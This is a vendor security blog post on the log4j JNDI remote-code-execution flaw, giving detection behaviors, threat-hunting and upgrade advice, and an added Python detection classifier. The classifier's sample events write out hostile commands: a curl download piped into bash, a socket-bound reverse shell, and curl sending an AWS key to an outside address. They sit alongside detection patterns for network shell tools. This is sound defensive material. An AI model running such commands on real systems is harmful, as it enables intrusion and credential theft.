The recently announced Apache log4j vulnerability has exposed businesses to a serious threat that is easy to exploit on a software component that is pervasively used in their environment. While security teams are busy trying to patch and upgrade their systems as quickly as possible, it is often easier said than done. Attackers in the meantime have stepped up scanning and exploitation activities to create an initial foothold from which they can extend their campaigns to cause major impacts such as data breaches, ransoms, and service disruptions. Here we describe the impacts of this dangerous vulnerability and the key areas of attention for organizations to secure their assets in this escalating threat landscape.
Summary of the Apache Log4j Vulnerability
Apache disclosed vulnerabilities, CVE-2021-44228 and CVE-2021-45046, in the log4j library, affecting Apache Log4j 2 versions 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0. This remote code execution (RCE) vulnerability has a critical severity with a CVSS score of 10. It is easy to exploit: sending a specially crafted request to the vulnerable application allows an attacker to carry out remote code execution on the vulnerable system. It is recommended that organizations upgrade to the latest Apache Log4j version, 2.17.0, which addresses CVE-2021-44228 (December 10, 2021), CVE-2021-45046 (December 14, 2021), and the recent CVE-2021-45105 (December 18, 2021).
The vulnerability involves an attacker sending a Java Naming and Directory Interface (JNDI) lookup message in a request to the vulnerable system. When the log4j component of the Java application processes this request, it triggers a message lookup that loads and executes remote Java class code, provided message lookup substitution is enabled. Successful exploitation can allow a remote, unauthenticated attacker to take full control of a vulnerable target system.
Dangers of Log4j
Some characteristics of the Apache log4j exploit and their impact include:
a. Easy to trigger with a simple user-crafted message that is logged by a Java application.
b. Large exposure, as Apache log4j is an extremely common logging component for many Java applications.
c. Hard to find, as its common usage means an application’s many dependent components might be using it as well. Experts are expecting that it will be many months before businesses can comprehensively patch for this vulnerability.
d. Initially a zero-day vulnerability that led to security teams scrambling to patch their systems. Attackers have also been scanning for this vulnerability round the clock to create a foothold.
e. Post-exploit impact is yet to be seen. In many cases, attackers might have focused on creating a foothold, which can lead to the continuation of the attack to crown jewels over the next several weeks, culminating in a major impact.
Advice for next steps
In addition to quickly implementing preventative upgrades of their environment, organizations must address several critical needs.
Confluera CxDR addresses these critical needs with our enhanced log4j specific threat detections and unique real-time threat storyboarding technology that can identify signs of any post-exploit presence of the attacker. Ideally with the aid of solutions such as Confluera CxDR, organizations are enabled to focus on the following steps:
● Enhance detection controls to identify log4j exploitation.
Anomalous and unexpected system-level behaviors of running Java applications are strong indications of a possible exploit of the log4j vulnerability. The following behaviors are often performed after successful exploitation of a Java application by remote code execution, and we are rolling out enhanced rules to detect them:
a. starting a shell
b. suspicious launch of network utilities such as nc, nmap, netstat, curl, wget
c. reverse shell established
d. connecting outbound using ldap/rmi/dns/iiop protocols
e. invoking curl/wget commands to download and execute a file
f. invoking curl with AWS credentials
Confluera CxDR detects all such suspicious log4j exploitation activities with out-of-box detection rules.
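As an added example (not Confluera's rules or code), a small Python classifier that applies the six behaviors listed above to process and network events attributed to a running Java application. The event records, the 203.0.113.5 address, the ports mapped to ldap/rmi/dns/iiop and the AWS key pattern are constructed assumptions for illustration; real telemetry fields will differ.

```python
import re

# Constructed sample events (not real telemetry): each is one child process or
# outbound connection attributed to a parent process. 203.0.113.5 is a documentation address.
EVENTS = [
    {"parent": "java", "proc": "sh", "cmd": "sh -c id", "stdio_socket": False},
    {"parent": "java", "proc": "curl", "cmd": "curl http://203.0.113.5/x.sh | bash", "stdio_socket": False},
    {"parent": "java", "proc": "bash", "cmd": "bash -i", "stdio_socket": True},   # stdin/stdout bound to a socket
    {"parent": "java", "proc": "java", "cmd": "", "stdio_socket": False, "net": ("203.0.113.5", 1389)},
    {"parent": "java", "proc": "curl", "cmd": "curl -H 'X-Key: AKIAIOSFODNN7EXAMPLE' https://203.0.113.5/",
     "stdio_socket": False},
    {"parent": "cron", "proc": "curl", "cmd": "curl https://example.com/health", "stdio_socket": False},
]

SHELLS = {"sh", "bash", "dash", "zsh"}
NET_TOOLS = {"nc", "ncat", "nmap", "netstat", "curl", "wget"}
# Assumed port-to-protocol map for the lookup protocols named in the post (1389 is a common
# non-standard LDAP port; 683 is IANA corba-iiop). Extend for your environment.
PORT_PROTO = {389: "ldap", 636: "ldap", 1389: "ldap", 1099: "rmi", 53: "dns", 683: "iiop"}
AWS_KEY = re.compile(r"AKIA[0-9A-Z]{16}")                       # AWS access key id shape
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*(\|\s*(sh|bash)\b|chmod\s+\+x|&&\s*\./)")


def classify(ev):
    """Return the labels (a-f from the list above) that match one event of a java parent."""
    hits = []
    if ev["parent"] != "java":
        return hits                                  # only children/connections of java matter here
    if ev["proc"] in SHELLS:
        hits.append("a:shell")
        if ev.get("stdio_socket"):
            hits.append("c:reverse_shell")           # shell whose stdio is a network socket
    if ev["proc"] in NET_TOOLS:
        hits.append("b:network_utility")
    _ip, port = ev.get("net", (None, None))
    if port in PORT_PROTO:
        hits.append(f"d:outbound_{PORT_PROTO[port]}")
    if DOWNLOAD_EXEC.search(ev["cmd"]):
        hits.append("e:download_and_execute")        # fetch piped into a shell or chmod+x then run
    if ev["proc"] == "curl" and AWS_KEY.search(ev["cmd"]):
        hits.append("f:curl_with_aws_credentials")
    return hits


def scan(events):
    """Map event index -> matched labels, keeping only events that triggered at least one rule."""
    return {i: classify(ev) for i, ev in enumerate(events) if classify(ev)}
```

Running scan(EVENTS) flags the five java-parented events and ignores the cron-launched curl, which is the whole point of keying the rules on the parent process.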
● Proactive Threat Hunting to check for signs of compromise
As organizations look to deploy new processes and rules, they must be cognizant of the fact that some of the malicious actions could have already taken place. Organizations must leverage any audit and event monitoring tools deployed to proactively search for suspicious log4j exploit activity over the past weeks (or as far back as the event retention interval permits) to ensure that they have not been already compromised.
Confluera CxDR includes the ability to search the data collected already over the past months and check if these behaviors have manifested in the customer environments and led to anything malicious.
● Enhance monitoring of post-exploit attack steps and mitigate before damage.
As noted earlier, this easy-to-trigger zero-day vulnerability with a large attack surface has produced a significant window of opportunity for attackers to create initial footholds from which they can launch stealthy attack campaigns over the next weeks and months. MITRE ATT&CK describes this attack lifecycle in an industry-standard framework of multiple tactics, techniques and procedures, including post-exploit steps that eventually impact the crown jewels.
Organizations not only need to bolster their preventative capabilities to block these exploits from happening but must also adopt an assume-breach mindset to incorporate capabilities that can identify the entire attack lifecycle in case there is a successful exploit.
Confluera CxDR has leveraged MITRE ATT&CK as the de-facto security framework, and our security team works closely to contribute back our research to MITRE ATT&CK® v10. Confluera’s real-time threat storyboarding is purpose-built with out-of-the-box detection of these TTPs and accurate stitching of post-exploit steps to uncover the overall attack lifecycle.
Given the escalated threat exposure, Confluera’s security team is leveraging the real-time threat storyboarding capability to increase the proactive monitoring of all customer environments for such suspicious activities and will communicate immediately if we find anything unusual.
Upgrade systems/applications
Organizations need to make sure they are able to find all instances of the vulnerable software component and incorporate operationally efficient ways to deploy the upgrades. Here are a few recommended practices:
● Review applications that directly or indirectly use log4j. There are several custom Java applications for which use of log4j can only be found by scanning the jar files. We recommend use of the open source scanning tools mentioned in the CISA analysis.
● The most critical step should be to upgrade log4j instances to the latest version (currently 2.17.0). In case that is a challenge, we can provide more information about using other methods such as disabling the JNDI lookup on the Java process command line, using an environment variable setting, and JNDI class removal.
● For more information on the log4j exploit and how to remediate it, refer to the CISA vulnerability guidance page.
Conclusion
As organizations get a grip on this major zero-day vulnerability, we are again reminded of how hard it can be to prevent attackers from getting in and how massive the potential impact can be. Confluera CxDR is purpose-built with the assumed-breach mindset to not only detect an exploit but also deliver the ability to accurately storyboard post-exploit attack steps to quickly identify and mitigate the threats if an attacker sneaks in. Organizations are encouraged to adopt this mindset and equip themselves with capabilities that will keep their businesses secure in the presence of such major incidents, which are regularly happening today.